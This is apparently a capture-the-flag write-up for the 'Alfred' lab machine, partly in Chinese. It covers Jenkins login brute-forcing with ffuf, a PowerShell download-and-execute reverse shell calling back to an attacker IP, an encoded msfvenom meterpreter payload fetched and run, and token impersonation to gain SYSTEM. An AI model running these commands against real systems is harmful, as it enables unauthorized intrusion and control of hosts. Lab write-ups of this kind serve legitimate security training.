Alfred - HackMD

# Alfred [TOC] ###### tags: `vulnerableMachine` Automation server(Jenkins - This tool is used to automatically deploy their code once they made change to it. Jenkins 是一個開源的持續整合 (Continuous Integration) 工具，用於支援軟體開發團隊的持續整合和部署流程。它可以自動執行測試、打包、部署等操作，並通知團隊成員異常。通過使用 Jenkins，開發團隊可以更快速地檢測問題並修正它們，提高軟體品質。 ## Initial Access >How many ports are open? (TCP only) ![](https://i.imgur.com/MUtJWc0.png) ![](https://i.imgur.com/6PQtdwr.png) Ans 3 --- >What is the username and password for the log in panel(in the format username:password) loin page -> we could try brute attack and try to find out the account and password ![](https://i.imgur.com/1enOqD5.png) ``` ffuf -u http://10.10.212.65:8080/j_acegi_security_check -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "j_username=w1&j_password=w2" -w fasttrack.txt:w1,rockyou.txt:w2 -fc 200 ``` ``` ffuf -u http://10.10.239.38:8080/j_acegi_security_check -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "j_username=admin&j_password=FUZZ" -w rockyou.txt -mr "Invalid username or password" ``` admin:admin ![](https://i.imgur.com/FR2MHOQ.png) ### Power shell ![](https://i.imgur.com/6oJ7qcH.png) ![](https://i.imgur.com/yvfoTpJ.png) ``` powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.11.72:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.11.72 -Port 443 ``` new webclien iex -> remote download and execute it ### Shell Mode - Bind - Reverse ![](https://i.imgur.com/Aoy26fE.png) ![](https://i.imgur.com/eqIxkLJ.png) ![](https://i.imgur.com/xlyqcQR.png) ## Switching Shells Meterpreter ``` msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.11.72 LPORT=80 -f exe -o meowshell.exe ``` TCP Handler ![](https://i.imgur.com/2vKI9TU.png) Running on Power Shell ``` powershell iex (New-Object System.Net.WebClient).Downloadfile('http://10.17.11.72:8000/meowmeowshell.exe','meowmeowshell.exe') ``` or ``` Invoke-WebRequest -Uri http://10.17.11.72:8000/meowmeowshell.exe -OutFile .\meowmeowshell.exe ``` Execute the shell ``` Start-process meowmeowshell.exe ``` Get it !!! ![](https://i.imgur.com/UEc3L7M.png) ## Privilege Escalation Goal: using the token to gain system access. LSASS.exe ![](https://i.imgur.com/57lKizf.png) ![](https://i.imgur.com/VrDEiuj.png) ### Token type ![](https://i.imgur.com/woPRayt.png) ### impersonate token (Process) ![](https://i.imgur.com/0GZvf6F.png) >View all the privileges using whoami /priv ![](https://i.imgur.com/DRgcgzA.png) --- ![](https://i.imgur.com/Bq1y2Qo.png) --- ![](https://i.imgur.com/ExAOVqd.png) ![](https://i.imgur.com/yAOxIir.png) --- To check which tokens are available (Group) ![](https://i.imgur.com/ycPKnjN.png) ![](https://i.imgur.com/8MxJIM8.png) --- impersonate local systems ![](https://i.imgur.com/bL29fgO.png) ![](https://i.imgur.com/Hrr80qZ.png) ## Now we have to migrate Due to windows uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do ![](https://i.imgur.com/mrctv4i.png) migrate AUTHROITY\SYSTEM ![](https://i.imgur.com/vPYiXpJ.png) ``` migrate 668 ``` ![](https://i.imgur.com/ZrdJRtm.png) dff0f748678f280250f25a45b8046b4a